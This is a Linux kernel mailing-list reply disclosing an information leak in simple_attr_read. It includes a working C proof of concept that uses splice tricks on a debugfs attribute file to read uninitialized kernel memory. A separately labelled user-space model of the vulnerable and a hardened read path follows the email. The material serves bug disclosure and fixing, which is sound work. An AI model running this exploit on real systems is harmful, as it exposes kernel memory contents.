Re: KMSAN: uninit-value in simple_attr_read

From: Alexander Potapenko
Date: Wed Mar 04 2020 - 09:36:39 EST


Hi Greg, Rafael, Arnd,

> This report says it's uninit in strlen, but there's actually an
> information leak later on that lets the user read arbitrary data past
> the non-terminated attr->get_buf.

The attached PoC demonstrates the problem.
I am not sure how bad that is, given that /sys/kernel/debug is usually
accessible only to root, and simple attribute files don't seem to
be used anywhere else.

#define _GNU_SOURCE

#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/uio.h>
#include <unistd.h>

#define BUF_SIZE 128

int main(int argc, char *argv[])
{
	char buf[BUF_SIZE];
	const char def_filename[] = "/sys/kernel/debug/bluetooth/6lowpan_enable";
	const char *filename = def_filename;
	int pipefd[2], dfs_fd;
	struct iovec iov;

	/* Any simple attribute file in debugfs will do; the default needs
	 * the bluetooth 6lowpan debugfs file and root (debugfs is root-only). */
	if (argc > 1)
		filename = argv[1];

	pipe(pipefd);

	/* Stage one byte in the pipe.  A fresh anonymous mapping is
	 * zero-filled, so the byte that reaches the attribute is a NUL. */
	iov.iov_base = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
			    MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	iov.iov_len = 1;
	vmsplice(pipefd[1], &iov, 1, SPLICE_F_MOVE);

	dfs_fd = open(filename, O_RDWR);
	if (dfs_fd < 0) {
		perror(filename);
		return 1;
	}

	/* Write the byte with splice() rather than write(): the splice path
	 * advances the file position, which a plain write() to a simple
	 * attribute file does not.  The position is now 1. */
	splice(pipefd[0], NULL, dfs_fd, NULL, 1, SPLICE_F_NONBLOCK);

	/* A read at a nonzero position takes the "continued read" path in
	 * simple_attr_read(): get_buf is strlen()ed and copied out although
	 * nothing has been formatted into it yet, so this returns whatever
	 * follows in memory up to the next NUL. */
	memset(buf, 0, BUF_SIZE);
	read(dfs_fd, buf, BUF_SIZE);
	printf("'%s'\n", buf);
	return 0;
}
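To make the read path the PoC exercises easier to follow, here is a user-space model of it, added as an illustration; it is not code from this thread or from fs/libfs.c. The struct layout, the buffer sizes, the model_* names and the hardened variant are assumptions made for the example: the model only reproduces the shape of the logic (a nonzero position selects the "continued read" branch) and one possible way of closing it.

```c
#include <stdio.h>
#include <string.h>

#define MODEL_GET_BUF 24   /* assumed size of get_buf, not the kernel's */
#define MODEL_TAIL    16   /* bytes that happen to follow it in memory */

struct model_attr {
	long long val;
	char get_buf[MODEL_GET_BUF];
	char tail[MODEL_TAIL];
};

/* Stand-in for simple_read_from_buffer(): copy out from offset *ppos. */
static size_t model_read_from_buffer(char *to, size_t len, long long *ppos,
				     const char *from, size_t avail)
{
	size_t pos = (size_t)*ppos, n;

	if (pos >= avail)
		return 0;
	n = avail - pos;
	if (n > len)
		n = len;
	memcpy(to, from + pos, n);
	*ppos += (long long)n;
	return n;
}

/* Vulnerable shape: a nonzero *ppos alone selects "continued read", so
 * get_buf is strlen()ed and copied out even if nothing was formatted. */
size_t model_vuln_read(struct model_attr *a, char *buf, size_t len,
		       long long *ppos)
{
	size_t size;

	if (*ppos)
		size = strlen(a->get_buf);
	else
		size = (size_t)snprintf(a->get_buf, sizeof a->get_buf,
					"%lld\n", a->val);
	return model_read_from_buffer(buf, len, ppos, a->get_buf, size);
}

/* Hardened shape (an assumption for this example, not the upstream fix):
 * state is zeroed at setup and a read only continues if get_buf already
 * holds a formatted value; otherwise the value is formatted first. */
size_t model_fixed_read(struct model_attr *a, char *buf, size_t len,
			long long *ppos)
{
	size_t size;

	if (*ppos && a->get_buf[0])
		size = strlen(a->get_buf);
	else
		size = (size_t)snprintf(a->get_buf, sizeof a->get_buf,
					"%lld\n", a->val);
	return model_read_from_buffer(buf, len, ppos, a->get_buf, size);
}

/* Replay the PoC against the vulnerable shape: memory filled with 'A'
 * (standing in for fresh kmalloc() contents; one NUL at the very end
 * keeps strlen() inside this object), position already 1 as after the
 * splice, then one read.  Returns how many bytes came from beyond get_buf. */
size_t model_vuln_leaked_bytes(void)
{
	struct model_attr a;
	char buf[64] = { 0 };
	long long pos = 1;
	size_t n;

	memset(&a, 'A', sizeof a);
	a.tail[MODEL_TAIL - 1] = '\0';
	a.val = 42;
	n = model_vuln_read(&a, buf, sizeof buf, &pos);
	return n > MODEL_GET_BUF - 1 ? n - (MODEL_GET_BUF - 1) : 0;
}

/* Same replay against the hardened shape: returns 1 if the read at
 * position 1 yields exactly the rest of the formatted "42\n". */
int model_fixed_read_ok(void)
{
	struct model_attr a;
	char buf[64] = { 0 };
	long long pos = 1;
	size_t n;

	memset(&a, 0, sizeof a);
	a.val = 42;
	n = model_fixed_read(&a, buf, sizeof buf, &pos);
	return n == 2 && strcmp(buf, "2\n") == 0;
}

int main(void)
{
	printf("vulnerable shape: %zu bytes from beyond get_buf\n",
	       model_vuln_leaked_bytes());
	printf("hardened shape returned only formatted data: %s\n",
	       model_fixed_read_ok() ? "yes" : "no");
	return 0;
}
```

In the model the vulnerable replay hands out every byte up to the NUL placed at the end of the struct, i.e. the 15 bytes that sit after get_buf; in the kernel the run would continue through whatever follows the attribute in its slab object. The hardened replay formats the value before copying, so position 1 just returns the rest of the formatted number.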